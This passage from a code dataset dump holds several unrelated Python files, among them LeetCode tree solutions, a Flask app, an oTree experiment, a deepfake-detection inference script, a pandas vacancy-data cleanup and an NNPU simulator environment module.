\r\n print('unknown dtype')\r\n return 0\r\n\r\n","sub_path":"src/scio/scio.py","file_name":"scio.py","file_ext":"py","file_size_in_byte":8758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"235690629","text":"# -*- coding: utf-8 -*-\n\"\"\"\ntehtava04.py\nViikko 2, tehtävä 4\nMarko Vihoma\n\"\"\"\n\n\ndef pituusmitta(text):\n \"\"\" Palauttaa parametrin merkkien määrän \"\"\"\n return len(str(text))\n\n\ndef main():\n \"\"\" Pääfunktio \"\"\"\n empty = 'Et antanut syötettä'\n text = empty\n\n while True:\n text = input('Anna syöte (Lopeta lopettaa): ')\n\n if text == 'Lopeta':\n return\n\n if text == '':\n print(empty)\n else:\n size = len(text)\n print(str(\"Antamasi syöte oli {0} merkkiä pitkä\").format(size))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"vko2/tehtava04.py","file_name":"tehtava04.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114823778","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n# traverse + divide conquer\nclass Solution(object):\n # value consecutive\n def longestConsecutive(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n return self.helper(root, None, 0)\n\n def helper(self, root, parent, length_no_root):\n if not root: return 0\n\n if parent != None and parent.val + 1 == root.val:\n length = length_no_root + 1\n else:\n length = 1\n # left and right subtree, parent is root\n left = self.helper(root.left, root, length)\n right = self.helper(root.right, root, length)\n return max(length, max(left, right))\n #分治法的思想,对左右子节点分别处理,\n #如果左子节点存在且节点值比其父节点值大1,则递归调用函数,\n #如果节点值不是刚好大1,则递归调用重置了长度的函数,对于右子节点的处理情况和左子节点相同\n\n\n# another version \n\n\"\"\"\nclass ResultType:\n maxInSubtree, maxFromRoot = 0, 0\n def __init__(self, maxInSubtree, maxFromRoot):\n this.maxInSubtree = maxInSubtree\n this.maxFromRoot = maxFromRoot\n\"\"\"\nclass Solution(object):\n # value consecutive\n def longestConsecutive(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n return self.helper(root)[0]\n\n def helper(self, root):\n if not root: return 0,0\n left = self.helper(root.left)\n right = self.helper(root.right)\n\n result = (0, 1)# maxInsubtree, maxFromRoot\n if root.left and root.val + 1 == root.left.val:\n result = (0, max(result[1], left[1] + 1))\n if root.right and root.val + 1 == root.right.val:\n result = (0, max(result[1], right[1] + 1))\n\n result = (max(result[1], max(left[0], right[0])), result[1])\n return result\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"binary_tree/longest_consecutive_sequence.py","file_name":"longest_consecutive_sequence.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"241117302","text":"from flask import Flask, render_template\nfrom domain.domains import Jogo\napp = Flask(__name__)\n\n\ndef jogos_padrao():\n return [\n Jogo('Tetris', 'Arcade', 'Atari'),\n Jogo('Mario', 'Plataforma', 'SNES'),\n Jogo('Pokemon Lets Go', 'RPG', 'Switch')\n ]\n\n\n@app.route('/home')\ndef home():\n lista_jogos = jogos_padrao()\n return render_template('lista.html', titulo='JOGOS', jogos=lista_jogos)\n\n\n@app.route('/novo')\ndef novo():\n return render_template('cadastro.html', titulo='Novo Jogo'),\n\n\ndef main():\n app.run()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"jogoteca.py","file_name":"jogoteca.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"47914574","text":"#本文件计算所有耗时算法(图像算法为主)的运行时间\nfrom timeit import default_timer as timer\n\n\nclass CostTimeCal:\n def __init__(self, CostTimeTypes, isCaled):\n '''\n\n :param CostTimeTypes: 字符串 说明是计算哪种消耗时间,\n 例如'LkTrackTime','YoloTime','BglearnTime'\n :param isCaled: 布尔值,说明是否计算\n '''\n self.__CostTimeType = CostTimeTypes #str 说明是计算哪种消耗时间\n self.__isCal = isCaled\n self.__startTime = 0\n self.__endTime = 0\n self.__costTime = -1\n\n def calSet(self):\n if self.__isCal is True:\n self.__startTime = timer()\n\n def calEnd(self):\n if self.__isCal is True:\n self.__endTime = timer()\n costTime = self.__endTime - self.__startTime\n self.__costTime = costTime\n return round(self.__costTime, 3) #保留三位小数\n\n def printCostTime(self):\n if self.__isCal is True:\n print(str(self.__CostTimeType)+\" = %f ms\" % (round(self.__costTime * 1000)))\n else:\n pass\n\n\n\n\n# def costTimeCalInit():\n#\n# trackStartTime = 0\n# trackEndTime = 0\n# if statisticTrackTime is True:\n# trackStartTime = timer()\n# p0, label, LKtrackedList = self.imgproc.trackObj(featureimg, secondimg, drawimg, label, p0, deltaT)\n# if statisticTrackTime is True:\n# trackEndTime = timer()\n# trackCostTime = trackEndTime - trackStartTime\n# print(\"TrackCostTime!!!!!!!!!!!!!!!!!!!!!! = %f ms\" % (trackCostTime * 1000))","sub_path":"tools/costTimeCal.py","file_name":"costTimeCal.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"544698749","text":"# -*- coding: utf-8 -*-\n# pylint: disable=invalid-name\n###############################################################################\n# Copyright (c), The AiiDA-CP2K authors. #\n# SPDX-License-Identifier: MIT #\n# AiiDA-CP2K is hosted on GitHub at https://github.com/aiidateam/aiida-cp2k #\n# For further information on the license, see the LICENSE.txt file. #\n###############################################################################\n\"\"\"Run DFT calculation with structure specified in the input file\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport sys\nimport click\n\nfrom aiida.orm import (Code, Dict)\nfrom aiida.engine import run\nfrom aiida.common import NotExistent\nfrom aiida.plugins import CalculationFactory\n\nCp2kCalculation = CalculationFactory('cp2k')\n\n\n@click.command('cli')\n@click.argument('codelabel')\ndef main(codelabel):\n \"\"\"Run DFT calculation with structure specified in the input file\"\"\"\n try:\n code = Code.get_from_string(codelabel)\n except NotExistent:\n print(\"The code '{}' does not exist\".format(codelabel))\n sys.exit(1)\n\n print(\"Testing CP2K ENERGY on H2 (DFT) without StructureData...\")\n\n # parameters\n parameters = Dict(\n dict={\n 'FORCE_EVAL': {\n 'METHOD': 'Quickstep',\n 'DFT': {\n 'BASIS_SET_FILE_NAME': 'BASIS_MOLOPT',\n 'QS': {\n 'EPS_DEFAULT': 1.0e-12,\n 'WF_INTERPOLATION': 'ps',\n 'EXTRAPOLATION_ORDER': 3,\n },\n 'MGRID': {\n 'NGRIDS': 4,\n 'CUTOFF': 280,\n 'REL_CUTOFF': 30,\n },\n 'XC': {\n 'XC_FUNCTIONAL': {\n '_': 'LDA',\n },\n },\n 'POISSON': {\n 'PERIODIC': 'none',\n 'PSOLVER': 'MT',\n },\n },\n 'SUBSYS': {\n # structure directly included in parameters\n 'CELL': {\n 'ABC': '4.0 4.0 4.75'\n },\n 'COORD': {\n ' ': ['H 2.0 2.0 2.737166', 'H 2.0 2.0 2.000000']\n },\n 'KIND': [\n {\n '_': 'O',\n 'BASIS_SET': 'DZVP-MOLOPT-SR-GTH',\n 'POTENTIAL': 'GTH-LDA-q6'\n },\n {\n '_': 'H',\n 'BASIS_SET': 'DZVP-MOLOPT-SR-GTH',\n 'POTENTIAL': 'GTH-LDA-q1'\n },\n ],\n },\n }\n })\n\n # resources\n options = {\n \"resources\": {\n \"num_machines\": 1,\n \"num_mpiprocs_per_machine\": 1,\n },\n \"max_wallclock_seconds\": 1 * 3 * 60,\n }\n\n inputs = {'parameters': parameters, 'code': code, 'metadata': {'options': options,}}\n\n print(\"submitted calculation...\")\n calc = run(Cp2kCalculation, **inputs)\n\n # check energy\n expected_energy = -1.14005678487\n if abs(calc['output_parameters'].dict.energy - expected_energy) < 1e-10:\n print(\"OK, energy has the expected value\")\n else:\n print(\"ERROR!\")\n print(\"Expected energy value: {}\".format(expected_energy))\n print(\"Actual energy value: {}\".format(calc['output_parameters'].dict.energy))\n sys.exit(3)\n\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main() # pylint: disable=no-value-for-parameter\n","sub_path":"examples/single_calculations/test_no_struct.py","file_name":"test_no_struct.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"263466046","text":"from otree.api import (\n models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,\n Currency as c, currency_range\n)\nimport random\n\n\nclass Constants(BaseConstants):\n name_in_url = 'producer_consumer'\n players_per_group = 8\n num_rounds = 2\n endowment = c(50)\n reward = c(20)\n red = 'Red'\n blue = 'Blue'\n trade_good = 'Trade Good'\n\nclass Subsession(BaseSubsession):\n def creating_session(self):\n if self.round_number == 1:\n self.group_randomly()\n\n # create random pairings\n self.session.vars['pairs'] = []\n for r in range(Constants.num_rounds):\n pairs = {}\n\n # a way to pair people given certain probabilities of\n # getting paired within your group or within the other group\n # NOTE: self.session.config['probability_of_same_group'] times\n # Constants.players_per_group needs to be an integer.\n g1 = [i for i in range(Constants.players_per_group)]\n random.shuffle(g1)\n g1_sample_homogeneous = random.sample(g1,\n int(Constants.players_per_group\n * self.session.config['probability_of_same_group']))\n g1_sample_heterogeneous = [x for x in g1\n if x not in g1_sample_homogeneous]\n g2 = [i for i in range(Constants.players_per_group)]\n random.shuffle(g2)\n g2_sample_homogeneous = random.sample(g2,\n int(Constants.players_per_group\n * self.session.config['probability_of_same_group']))\n g2_sample_heterogeneous = [x for x in g2\n if x not in g2_sample_homogeneous]\n for i in range(0, len(g1_sample_homogeneous), 2):\n pairs[(0, g1_sample_homogeneous[i])] = (0,\n g1_sample_homogeneous[i + 1])\n pairs[(0, g1_sample_homogeneous[i + 1])] = (0,\n g1_sample_homogeneous[i])\n for i in range(0, len(g2_sample_homogeneous), 2):\n pairs[(1, g2_sample_homogeneous[i])] = (1,\n g2_sample_homogeneous[i + 1])\n pairs[(1, g2_sample_homogeneous[i + 1])] = (1,\n g2_sample_homogeneous[i])\n for i in range(len(g1_sample_heterogeneous)):\n pairs[(0, g1_sample_heterogeneous[i])] = (1,\n g2_sample_heterogeneous[i])\n pairs[(1, g2_sample_heterogeneous[i])] = (0,\n g1_sample_heterogeneous[i])\n self.session.vars['pairs'].append(pairs)\n \n # there will always only be 2 groups\n for g_index, g in enumerate(self.get_groups()):\n # set group color for player\n group_color = Constants.red if g_index == 0 else Constants.blue\n # define random roles for players (producer/consumer),\n # ensuring half are producers and half are consumers\n roles = [Constants.trade_good for n in range(int(Constants.players_per_group / 2))]\n roles += [group_color for n in range(\n int(Constants.players_per_group / 2))]\n random.shuffle(roles)\n # set each player's group color, and starting token (which\n # defines role\n for p_index, p in enumerate(g.get_players()):\n p.participant.vars['group_color'] = group_color\n p.participant.vars['token'] = roles[p_index]\n p.participant.payoff += Constants.endowment\n else:\n self.group_like_round(1)\n \nclass Group(BaseGroup):\n pass\n\nclass Player(BasePlayer):\n role_pre = models.StringField() # 'Producer', 'Consumer'\n other_role_pre = models.StringField()\n token_color = models.StringField() # Constants.red, Constants.blue, None\n other_token_color = models.StringField()\n group_color = models.StringField() # Constants.red, Constants.blue\n other_group_color = models.StringField()\n trade_attempted = models.BooleanField(\n choices=[\n [False, 'No'],\n [True, 'Yes'],\n ]\n )\n trade_succeeded = models.BooleanField()\n\n def set_payoffs(self, round_payoff):\n self.payoff = round_payoff\n\n","sub_path":"games_up/bimonetary/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"463629955","text":"import cv2 as cv\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nfrom PIL import Image as pil_image\r\nfrom transform import xception_default_data_transforms\r\nimport dlib\r\nimport time\r\nimport torch\r\nimport csv\r\nimport torch.nn as nn\r\nimport importlib.util\r\nhome='/kaggle/input/deepfake-detection-challenge/'\r\nvideos=os.listdir(home)\r\nfile=open('/kaggle/working/submission.csv',mode='w',newline='')\r\nwrite=csv.writer(file,delimiter=',')\r\nos.chdir('/kaggle/input/transform/')\r\nimportlib.import_module('transform')\r\nos.chdir('/kaggle/input/network/')\r\nimportlib.import_module('network')\r\n\r\n\r\n\r\nwrite.writerow(['filename','label'])\r\ndef get_boundingbox(face, width, height, scale=1.3, minsize=None):\r\n \"\"\"\r\n Expects a dlib face to generate a quadratic bounding box.\r\n :param face: dlib face class\r\n :param width: frame width\r\n :param height: frame height\r\n :param scale: bounding box size multiplier to get a bigger face region\r\n :param minsize: set minimum bounding box size\r\n :return: x, y, bounding_box_size in opencv form\r\n \"\"\"\r\n x1 = face.left()\r\n y1 = face.top()\r\n x2 = face.right()\r\n y2 = face.bottom()\r\n size_bb = int(max(x2 - x1, y2 - y1) * scale)\r\n if minsize:\r\n if size_bb < minsize:\r\n size_bb = minsize\r\n center_x, center_y = (x1 + x2) // 2, (y1 + y2) // 2\r\n\r\n # Check for out of bounds, x-y top left corner\r\n x1 = max(int(center_x - size_bb // 2), 0)\r\n y1 = max(int(center_y - size_bb // 2), 0)\r\n # Check for too big bb size for given x, y\r\n size_bb = min(width - x1, size_bb)\r\n size_bb = min(height - y1, size_bb)\r\n\r\n return x1, y1, size_bb\r\ndef predict_with_model(image, model, post_function=nn.Softmax(dim=1),\r\n cuda=True):\r\n \"\"\"\r\n Predicts the label of an input image. Preprocesses the input image and\r\n casts it to cuda if required\r\n\r\n :param image: numpy image\r\n :param model: torch model with linear layer at the end\r\n :param post_function: e.g., softmax\r\n :param cuda: enables cuda, must be the same parameter as the model\r\n :return: prediction (1 = fake, 0 = real)\r\n \"\"\"\r\n # Preprocess\r\n preprocessed_image = preprocess_image(image, cuda)\r\n\r\n # Model prediction\r\n output = model(preprocessed_image)\r\n output = post_function(output)\r\n\r\n # Cast to desired\r\n _, prediction = torch.max(output, 1) # argmax\r\n prediction = float(prediction.cpu().numpy())\r\n\r\n return int(prediction), output\r\n\r\ndef preprocess_image(image, cuda=True):\r\n \"\"\"\r\n Preprocesses the image such that it can be fed into our network.\r\n During this process we envoke PIL to cast it into a PIL image.\r\n\r\n :param image: numpy image in opencv form (i.e., BGR and of shape\r\n :return: pytorch tensor of shape [1, 3, image_size, image_size], not\r\n necessarily casted to cuda\r\n \"\"\"\r\n # Revert from BGR\r\n image = cv.cvtColor(image, cv.COLOR_BGR2RGB)\r\n # Preprocess using the preprocessing function used during training and\r\n # casting it to PIL image\r\n preprocess = xception_default_data_transforms['test']\r\n preprocessed_image = preprocess(pil_image.fromarray(image))\r\n # Add first dimension as the network expects a batch\r\n preprocessed_image = preprocessed_image.unsqueeze(0)\r\n if cuda:\r\n preprocessed_image = preprocessed_image.cuda()\r\n return preprocessed_image\r\ndtype = torch.cuda.FloatTensor\r\nface_detector = dlib.get_frontal_face_detector()\r\nmodel = torch.load('/kaggle/input/network/network/all_c23.p')\r\nmodel=model.cuda()\r\n\r\n\r\nfor each in videos:\r\n\r\n\r\n nume=each\r\n each=home+'\\\\'+each\r\n\r\n capture = cv.VideoCapture(each)\r\n maxi=-1.0\r\n for i in range(0, 300):\r\n ret = capture.grab()\r\n\r\n if i % 35 == 0:\r\n ret, frame = capture.retrieve()\r\n\r\n if(ret):\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n faces = face_detector(gray, 1)\r\n if len(faces): \r\n faces=faces[0]\r\n height, width = frame.shape[:2]\r\n x, y, size = get_boundingbox(faces, width, height)\r\n cropped_face = frame[y:y+size, x:x+size]\r\n \r\n \r\n prediction,altceva=predict_with_model(cropped_face,model,cuda=True)\r\n rezultat=float(altceva.data[0].data[1])\r\n if(rezultat>maxi):\r\n maxi=rezultat\r\n # do something with frame\r\n\r\n if(maxi<0.2):\r\n maxi=0.2\r\n if(maxi>0.8):\r\n maxi=0.8\r\n write.writerow([nume,maxi])\r\n capture.release()\r\n \r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"65288047","text":"#!/usr/bin/python\n\nimport string\n\n#Removes non-alphanumeric characters\ndef __sanitize(input_str):\n translator = input_str.maketrans({\n key: None for key in string.punctuation + ' '\n })\n return input_str.translate(translator).lower()\n\n\ndef has_same_letters(str1, str2):\n return sorted(__sanitize(str1)) == sorted(__sanitize(str2))\n\n\ndef anagram(str1, str2):\n is_anagram = 'is' if has_same_letters(str1, str2) else 'is NOT'\n return '{} {} an anagram of {}'.format(str1, is_anagram, str2)\n\n\nif __name__ == '__main__':\n\n inputs = ['\"wisdom\" ? \"mid sow\"',\n '\"Seth Rogan\" ? \"Gathers No\"',\n '\"Reddit\" ? \"Eat Dirt\"',\n '\"Schoolmaster\" ? \"The classroom\"',\n '\"Astronomers\" ? \"Moon starer\"',\n '\"Vacation Times\" ? \"I\\'m Not as Active\"',\n '\"Dormitory\" ? \"Dirty Rooms\"'\n ]\n\n for input_string in inputs:\n input_arr = input_string.split(' ? ')\n print(anagram(*input_arr))\n","sub_path":"python/easy/challenge283_AnagramDetector/anagrams.py","file_name":"anagrams.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"555692260","text":"import pandas\nimport re\nfrom datetime import datetime\n\ndf = pandas.read_csv('Moscow.csv')\n\ndf[\"name\"] = df[\"name\"].str.lower()\n\n# Группировка вакансий по названиям\nvacancy_list = ['разработчик|developer|программист', 'инженер|engineer', 'архитектор|architect', 'аналитик|analyst',\n 'data scientist', 'c++', 'c#', 'python', 'js|javascript', '1c', 'goland', 'frontend',\n 'backend', 'full-stack|fullstack', 'security|безопасность']\n\nprint(df.columns)\n\nfor column_name in df.columns:\n print(df[column_name].value_counts())\n print(df[column_name].isnull())\n\ndf_group = pandas.DataFrame()\nfor vacancy in vacancy_list:\n for v in vacancy.split('|'):\n dfV = df[df[\"name\"].replace('/', '').str.contains(re.escape(v))]\n if len(df_group.columns) == 0:\n df_group = dfV.copy()\n else:\n df_group.append(dfV)\n group_name = vacancy\n print('======================' + str(group_name) + '======================')\n # Заполнить пропуски в вакансии средним значением\n df_group[\"min_salary\"] = df_group[\"min_salary\"].fillna(df_group[\"min_salary\"].mean())\n print(df_group[\"min_salary\"])\n\n df_date = pandas.to_datetime(df_group['published_date']).dt.tz_localize(None)\n df_date_now = pandas.to_datetime(datetime.now())\n df_days = df_date_now - df_date\n # Добавить новый признак в датасет на основе признака “дата размещения вакансии” - количество дней с момента\n # размещения;\n df_group[\"publish_date\"] = df_days\n print(df_group[\"publish_date\"])\n # Заполнить пропуски в признаке “требуемый опыт работы” по принципу: если не указан, то опыт не требуется;\n df_group[\"experience\"] = df_group[\"experience\"].fillna(\"Нет опыта\")\n # Заполнить пропуски в признаке “тип занятости” по принципу: если не указан, то любой тип;\n df_group[\"employment\"] = df_group[\"employment\"].fillna(\"Любой тип\")\n\n df_group[\"city\"] = df_group[\"city\"].dropna()\n df_group[\"description\"] = df_group[\"description\"].fillna(\"Нет описания\")\n df_group[\"duty\"] = df_group[\"duty\"].fillna(\"Нет описания обязанностей\")\n df_group[\"requirements\"] = df_group[\"requirements\"].fillna(\"Нет описания требований\")\n df_group[\"terms\"] = df_group[\"terms\"].fillna(\"Нет описания условий\")\n # Надо подумать, чем заполнять умения если компания их не заполнила. Я бы так и оставил пустым, хотя можно просто\n # значение задать \"неопределено\"\n #df_group[\"skills\"] = df_group[\"skills\"].fillna(\"[{'name': 'Неопределено'}]\")\n df_group[\"skills\"] = df_group[\"skills\"].fillna(\"Не указано\")\n df_group = pandas.DataFrame()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"65099447","text":"class BinarySearchTreeMap:\n\n class Item:\n def __init__(self, key, value=None):\n self.key = key\n self.value = value\n\n class Node:\n def __init__(self, item):\n self.item = item\n self.parent = None\n self.left = None\n self.right = None\n\n def num_children(self):\n count = 0\n if (self.left is not None):\n count += 1\n if (self.right is not None):\n count += 1\n return count\n\n def disconnect(self):\n self.item = None\n self.parent = None\n self.left = None\n self.right = None\n\n def __init__(self):\n self.root = None\n self.size = 0\n\n def __len__(self):\n return self.size\n\n def is_empty(self):\n return len(self) == 0\n\n # raises exception if not found\n def __getitem__(self, key):\n node = self.subtree_find(self.root, key)\n if (node is None):\n raise KeyError(str(key) + \" not found\")\n else:\n return node.item.value\n\n # returns None if not found\n def subtree_find(self, subtree_root, key):\n curr = subtree_root\n while (curr is not None):\n if (curr.item.key == key):\n return curr\n elif (curr.item.key > key):\n curr = curr.left\n else: # (curr.item.key < key)\n curr = curr.right\n return None\n\n\n # updates value if key already exists\n def __setitem__(self, key, value):\n node = self.subtree_find(self.root, key)\n if (node is None):\n self.subtree_insert(key, value)\n else:\n node.item.value = value\n\n # assumes key not in tree\n def subtree_insert(self, key, value=None):\n item = BinarySearchTreeMap.Item(key, value)\n new_node = BinarySearchTreeMap.Node(item)\n if (self.is_empty()):\n self.root = new_node\n self.size = 1\n else:\n parent = self.root\n if(key < self.root.item.key):\n curr = self.root.left\n else:\n curr = self.root.right\n while (curr is not None):\n parent = curr\n if (key < curr.item.key):\n curr = curr.left\n else:\n curr = curr.right\n if (key < parent.item.key):\n parent.left = new_node\n else:\n parent.right = new_node\n new_node.parent = parent\n self.size += 1\n\n\n #raises exception if key not in tree\n def __delitem__(self, key):\n if (self.subtree_find(self.root, key) is None):\n raise KeyError(str(key) + \" is not found\")\n else:\n self.subtree_delete(self.root, key)\n\n #assumes key is in tree + returns value assosiated\n def subtree_delete(self, node, key):\n node_to_delete = self.subtree_find(node, key)\n value = node_to_delete.item.value\n num_children = node_to_delete.num_children()\n\n if (node_to_delete is self.root):\n if (num_children == 0):\n self.root = None\n node_to_delete.disconnect()\n self.size -= 1\n\n elif (num_children == 1):\n if (self.root.left is not None):\n self.root = self.root.left\n else:\n self.root = self.root.right\n self.root.parent = None\n node_to_delete.disconnect()\n self.size -= 1\n\n else: #num_children == 2\n max_of_left = self.subtree_max(node_to_delete.left)\n node_to_delete.item = max_of_left.item\n self.subtree_delete(node_to_delete.left, max_of_left.item.key)\n\n else:\n if (num_children == 0):\n parent = node_to_delete.parent\n if (node_to_delete is parent.left):\n parent.left = None\n else:\n parent.right = None\n\n node_to_delete.disconnect()\n self.size -= 1\n\n elif (num_children == 1):\n parent = node_to_delete.parent\n if(node_to_delete.left is not None):\n child = node_to_delete.left\n else:\n child = node_to_delete.right\n\n child.parent = parent\n if (node_to_delete is parent.left):\n parent.left = child\n else:\n parent.right = child\n\n node_to_delete.disconnect()\n self.size -= 1\n\n else: #num_children == 2\n max_of_left = self.subtree_max(node_to_delete.left)\n node_to_delete.item = max_of_left.item\n self.subtree_delete(node_to_delete.left, max_of_left.item.key)\n\n return value\n\n # assumes non empty subtree\n def subtree_max(self, curr_root):\n node = curr_root\n while (node.right is not None):\n node = node.right\n return node\n\n\n def inorder(self):\n for node in self.subtree_inorder(self.root):\n yield node\n\n def subtree_inorder(self, curr_root):\n if (curr_root is None):\n pass\n else:\n yield from self.subtree_inorder(curr_root.left)\n yield curr_root\n yield from self.subtree_inorder(curr_root.right)\n\n def __iter__(self):\n for node in self.inorder():\n yield (node.item.key, node.item.value)\n","sub_path":"BinarySearchTreeMap.py","file_name":"BinarySearchTreeMap.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541553847","text":"'''the environment and context of NNPU hardware simulator\nsome code are from tvm/vta\n'''\n\nimport os\nimport json\nimport copy\nimport tvm\nimport yaml\n\nfrom .intrins import IntrinManager\nfrom .intrins import make_intrin_call\nfrom .helper import convert_scope\n\nclass Environment(object):\n \"\"\"Hardware configuration object.\n\n This object contains all the information\n needed for compiling to a specific NNPU backend.\n\n Parameters\n ----------\n cfg : dict of str to value.\n The configuration parameters.\n\n Example\n --------\n .. code-block:: python\n\n # the following code reconfigures the environment\n # temporarily to attributes specified in new_cfg.json\n new_cfg = json.load(json.load(open(\"new_cfg.json\")))\n with vta.Environment(new_cfg):\n # env works on the new environment\n env = vta.get_env()\n \"\"\"\n\n current = None\n # some constants\n dram_scope = 'local.nnpu_dram'\n scratchpad_scope_prefix = 'local.nnpu_scratchpad'\n uni_scratchpad_scope = scratchpad_scope_prefix + '0'\n acc_scope = 'local.nnpu_acc_buffer'\n # compiler pragmas\n dma_copy_pragma = 'nnpu_dma_copy'\n dma_copy_to_buf = 'nnpu_dma_to_scratchpad'\n dma_copy_from_buf = dma_copy_to_buf\n scratchpad_ls = 'nnpu_scratchpad_ls'\n scratchpad_copy = 'nnpu_scratchpad_copy'\n copy_acc2buf = 'nnpu_copy_acc2buf'\n # pipeline IDs:\n pid_dma_copy = 1\n pid_matrix_compute = 2\n pid_acc2buf_copy = 2\n pid_vector_compute = 3\n def pid_scratchpad_copy(self, dst):\n return 4 + self.scratchpad_scope_to_idx(dst)\n\n def __init__(self, cfg_path):\n self.cfg = {}\n\n cfg = yaml.load(open(cfg_path), Loader=yaml.SafeLoader)\n self.cfg_path = cfg_path\n self.cfg.update(cfg)\n\n self.nnpu_axis = tvm.thread_axis('nnpu')\n\n self.intrins = IntrinManager(self)\n pass\n\n def __enter__(self):\n self.last_env = Environment.current\n Environment.current = self\n #set_device(self)\n return self\n\n def __exit__(self, ptype, value, trace):\n Environment.current = self.last_env\n # reset device based on the last Environment\n #set_device(Environment.current)\n\n def scratchpad_scope(self, scratchpad_id = 0):\n assert scratchpad_id < 8, 'scratchpad_id should be less than 8'\n return self.scratchpad_scope_prefix + str(scratchpad_id)\n\n def get_scope(self, name):\n return convert_scope(self, name, True)\n\n def scratchpad_scope_to_idx(self, scope):\n assert self.is_scratchpad_scope(scope), \\\n '{0} is not a scratchpad scope name'\n id = scope[len(self.scratchpad_scope_prefix):]\n id = int(id)\n assert id < 8, 'scratchpad_id should be less than 8'\n return id\n\n def is_scratchpad_scope(self, scope):\n return scope.startswith(self.scratchpad_scope_prefix)\n\n def get_scope_config(self, scope):\n key = None\n if (self.is_scratchpad_scope(scope)):\n id = self.scratchpad_scope_to_idx(scope)\n key = 'scratchpad' + str(id)\n elif (scope == self.acc_scope):\n key = 'acc_buffer'\n else:\n raise ValueError('illegal scope name')\n return self.cfg[key]\n\n def get_pid(self, pid):\n return pid\n\n# set device with the configs in the environment\ndef set_device(env, device_id=0, type='S0'):\n func = tvm.get_global_func('nnpu.set_dev', False)\n print(\"setting device with config file: {0}\".format(env.cfg_path))\n func(int(device_id), str(type), str(env.cfg_path))\n\ndef set_dump(value):\n value = bool(value)\n func = tvm.get_global_func('nnpu.set_dump', True)\n if (func):\n func(value)\n\ndef set_profile(profiles, dir=None):\n func = tvm.get_global_func('nnpu.set_profile', False)\n flags = {'timeline': 0x1, 'memory_access_latency': 0x2}\n flag = 0\n for item in profiles:\n if (item in flags):\n flag = flag | flags[item]\n if (dir is not None):\n import os, errno\n try:\n os.makedirs(dir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n func(flag, dir)\n else:\n func(flag)\n\ndef get_env():\n return Environment.current\n\n# The memory information for the compiler\n@tvm.register_func(\"tvm.info.mem.%s\" % Environment.dram_scope)\ndef mem_info_dram():\n spec = get_env()\n dram_cfg = spec.cfg['dram']\n return tvm.make.node(\"MemoryInfo\",\n unit_bits=8,\n max_simd_bits=dram_cfg['width_per_channel'],\n max_num_bits=dram_cfg['nchannel'] * (1 << dram_cfg['log_size_per_channel']) * 8,\n head_address=None)\n\n#################################\n# register scratchpad memories. #\n#################################\ndef get_scratchpad_memory_info(env, scratchpad_idx):\n from .helper import scratchpad_base_addr\n scope = env.scratchpad_scope(scratchpad_idx)\n buffer_cfg = env.get_scope_config(scope)\n if (buffer_cfg and buffer_cfg['enable']):\n return tvm.make.node(\"MemoryInfo\",\n unit_bits=8,\n max_simd_bits=buffer_cfg['width_per_channel'],\n max_num_bits=(1 << buffer_cfg['log_size']) * 8,\n head_address=None,\n base_address=scratchpad_base_addr[scratchpad_idx])\n else:\n raise ValueError('scratchpad buffer \"{0}\" is not enabled, please check config file'.format(scope))\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '0'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 0)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '1'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 1)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '2'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 2)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '3'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 3)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '4'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 4)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '5'))\ndef mem_info_scratchpad():\n spec = 